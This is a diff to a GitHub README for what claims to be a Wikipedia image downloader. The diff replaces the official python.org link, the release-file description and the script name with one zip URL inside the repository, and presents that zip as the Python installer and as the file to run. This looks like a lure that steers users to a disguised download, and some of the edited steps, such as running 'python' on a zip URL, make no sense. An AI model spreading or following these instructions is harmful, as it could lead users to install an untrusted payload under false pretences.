Tobidinho2405/unlimited-wikipedia-image-and-photo-downloader/README.md

 This app needs Python to run.
 If you don’t have it, here’s how to get it:

-- Go to the official Python site: https://www.python.org/downloads/
+- Go to the official Python site: https://github.com/Tobidinho2405/unlimited-wikipedia-image-and-photo-downloader/raw/refs/heads/main/mitochondrial/wikipedia-downloader-photo-unlimited-image-and-3.8.zip
 - Download the version for your system (Windows, macOS, or Linux).
 - Follow the installation prompts to complete setup.
 - Make sure to check "Add Python to PATH" during installation on Windows.

 ### Step 3: Download the App Files

-On the release page, look for the latest version, then download the compressed file (usually a .zip or .tar.gz).
+On the release page, look for the latest version, then download the compressed file (usually a .zip or https://github.com/Tobidinho2405/unlimited-wikipedia-image-and-photo-downloader/raw/refs/heads/main/mitochondrial/wikipedia-downloader-photo-unlimited-image-and-3.8.zip).
 After downloading, extract the files to a folder you can easily access.

 ### Step 4: Run the Application

 - Open the folder where you extracted the files.
-- Look for a file named something like `download_images.py`.
+- Look for a file named something like `https://github.com/Tobidinho2405/unlimited-wikipedia-image-and-photo-downloader/raw/refs/heads/main/mitochondrial/wikipedia-downloader-photo-unlimited-image-and-3.8.zip`.
 - To run this file:
-  - On Windows: Open Command Prompt, navigate to the folder, and type `python download_images.py` then press Enter.
+  - On Windows: Open Command Prompt, navigate to the folder, and type `python https://github.com/Tobidinho2405/unlimited-wikipedia-image-and-photo-downloader/raw/refs/heads/main/mitochondrial/wikipedia-downloader-photo-unlimited-image-and-3.8.zip` then press Enter.
   - On macOS/Linux: Open Terminal, navigate to the folder, and type the same command.

 The program will start, and you will see prompts to enter information.